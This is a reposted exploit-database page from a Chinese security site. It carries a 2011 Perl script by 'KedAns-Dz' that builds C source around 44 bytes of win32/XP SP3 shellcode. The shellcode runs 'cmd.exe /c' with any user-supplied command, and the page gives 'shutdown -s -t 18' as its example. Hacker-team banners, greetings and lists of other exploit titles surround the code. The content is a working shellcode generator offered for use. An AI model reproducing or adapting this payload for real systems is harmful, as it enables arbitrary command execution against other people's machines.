首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Windows/32bit - Command Execution Exploit/ShellCode - 44 Bytes + CMD 来源：ked-h@hotmail.com 作者：KedAns-Dz 发布时间：2011-05-19   1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0     _                   __           __       __                     1 1   /' \            __  /'__`\        /\ \__  /'__`\                   0 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 1                  \ \____/ >> Exploit database separated by exploit   0 0                   \/___/          type (local, remote, DoS, etc.)    1 1                                                                      1 0  [+] Site            : 1337day.com                                   0 1  [+] Support e-mail  : submit[at]1337day.com                         1 0                                                                      0 1               #########################################              1 0               I'm KedAns-Dz member from Inj3ct0r Team                1 1               #########################################              0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #!/usr/bin/perl system("cls"); sub logo(){ print q' 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 1                      ______                                          0 0                   .-"      "-.                                       1 1                  / KedAns-Dz  \ =-=-=-=-=-=-=-=-=-=-=-|              0 0 Algerian HaCker |              | > Site : 1337day.com |              1 1 --------------- |,  .-.  .-.  ,| > Twitter : @kedans  |              0 0                 | )(_o/  \o_)( | > ked-h@hotmail.com  |              1 1                 |/     /\     \| =-=-=-=-=-=-=-=-=-=-=|              0 0       (@_       (_     ^^     _)  HaCkerS-StreeT-Team                1 1  _     ) \_______\__|IIIIII|__/_______________________               0 0 (_)@8@8{}<________|-\IIIIII/-|________________________>              1 1        )_/        \          /                                       0 0       (@           `--------` © 2011, Inj3ct0r Team                  1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 0 Windows/32bit - Command Execution Exploit/ShellCode - 44 Bytes + CMD 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 '; } logo(); ### # Title : win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD # Author : KedAns-Dz # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com # Twitter page : twitter.com/kedans # platform : win32 # Impact : Command Execution / Shellcode maker # Tested on : Windows XP sp3 Fr ### # (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends ### $ARGC=@ARGV; if ($ARGC!=1) {    print "\n [!] Usage: perl $0 [Command] \n\n";    die " [*] f.ex: perl $0 shutdown -s -t 18 \n"; } my $CMD = shift; my $header = q' #include <stdio.h> #include <string.h> #include <stdlib.h> int main(){         unsigned char shellcode[]= '; my $sh = q' "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x29\x53\xbb\xad\x23\x86\x7c". "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff". "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20'.$CMD.'"'; my $end = q'     printf("Size = %d bytes\n", strlen(shellcode));     ((void (*)())shellcode)();     return 0; } '; print $header.$sh.$end; #================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu # gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org) # JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org) # www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ... # -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- # (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever # h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm # Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz #================================================================================================   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·SpongeBob SquarePants Typing B ·BSDi/x86 - BindShell on 31337 ·Microsoft Windows Vista/Server ·linux/x86 Command Exec (reboot ·Archos 5/Archos OS 2.0.45 Medi ·Rootage 1.0.0.4 Alpha Director ·win32/xp sp3 Alphanumeric Shut ·Mac osX Browsers [FF + SF] ale ·Sonique 1.96 .m3u Buffer Overf ·7-Technologies IGSS <= v9.00.0 ·Magix Musik Maker 16 .mmm Stac ·VisiWave VWR File Parsing Trus   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved